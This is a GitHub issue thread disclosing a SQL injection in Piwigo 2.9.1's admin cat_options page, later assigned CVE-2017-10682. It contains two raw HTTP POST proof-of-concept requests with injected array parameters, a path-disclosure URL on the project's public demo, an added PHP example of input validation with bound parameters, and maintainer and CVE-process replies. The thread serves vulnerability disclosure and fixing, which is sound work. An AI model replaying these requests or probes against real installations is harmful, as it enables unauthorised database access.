Bug Report: SQL injection in page cat_options #724

Closed
Akityo opened this issue Jun 29, 2017 · 4 comments


Akityo commented Jun 29, 2017

Proof-of-Concept

version:2.9.1

section status

POST /piwigo/admin.php?page=cat_options&section=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=status
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_false%5B%5D=755&trueify=%C2%AB


section comments

POST /piwigo/admin.php?page=cat_options&section=comments HTTP/1.1
Host: www.test.com
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=comments
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_true%5B%5D=7*55&falsify=%C2%BB


Report By Topsec(Li Zhiqiang)
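
One way to handle the `cat_true[]` / `cat_false[]` array parameters from the requests above on the server side, as an added example that is not part of the original report and is not Piwigo's code. The `categories` table, its columns, and the helpers `parse_id_list` and `set_status` are hypothetical, and SQLite via PDO stands in for the real database.

```php
<?php
// Added example, not Piwigo code. Table, column and function names are hypothetical.

// Accept only an array of decimal category ids; reject everything else.
function parse_id_list($value): array
{
    if (!is_array($value)) {
        throw new InvalidArgumentException('expected an array of ids');
    }
    $ids = [];
    foreach ($value as $item) {
        // ctype_digit() is false for "7*55", "-1", "" and any non-digit text.
        if (!is_string($item) || !ctype_digit($item) || strlen($item) > 9) {
            throw new InvalidArgumentException('invalid category id');
        }
        $ids[] = (int) $item;
    }
    return array_values(array_unique($ids));
}

// One bound placeholder per id, so posted values never become SQL text.
function set_status(PDO $db, array $ids, string $status): int
{
    if ($ids === []) {
        return 0;
    }
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("UPDATE categories SET status = ? WHERE id IN ($marks)");
    $stmt->bindValue(1, $status, PDO::PARAM_STR);
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 2, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed demo data in an in-memory SQLite database (assumes pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE categories (id INTEGER PRIMARY KEY, status TEXT)");
$db->exec("INSERT INTO categories VALUES (7, 'public'), (55, 'public'), (755, 'public')");

// Constructed inputs shaped like the decoded bodies of the two requests in the report.
foreach ([['755'], ['7*55']] as $posted) {
    try {
        $n = set_status($db, parse_id_list($posted), 'private');
        echo json_encode($posted), " -> updated $n row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo json_encode($posted), " -> rejected: ", $e->getMessage(), "\n";
    }
}
```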

flop25 (Member) commented Jun 29, 2017

Thank you. You are still not using the contact form or emails :/

Akityo (Author) commented Jun 29, 2017

@flop25 sorry for that, and this one is probably the last bug report to piwigo :(
I just want the CVE Assignment Team to know the details, and they will verify whether this issue is a bug or not.
Because there is also an argument about a bug or not a bug between security researcher and programmer.

In addition, there is an information leak about the system root path when requesting the URL:
http://piwigo.org/demo/feed.php?feed=*
check_input_parameter /home/sys/var/www/piwigo.org/demo/feed.php(64)

flop25 added a commit that referenced this issue Jun 29, 2017
flop25 closed this as completed Jun 29, 2017
flop25 self-assigned this Jun 29, 2017
flop25 added this to the 2.9.2 milestone Jun 29, 2017

fgeek commented Jul 1, 2017

CVE-2017-10682 has been assigned for this issue.

plegall added a commit that referenced this issue Jul 3, 2017

fgeek commented Oct 7, 2017

@Akityo You can request CVEs without publishing the details in a public issue tracker. You can use https://cveform.mitre.org/ and reveal only the needed details. The CVE description can be updated after the CVE assignment if the issue is so critical that you don't want to reveal the info to MITRE before a fix. If you need any help or more information, feel free to contact me.
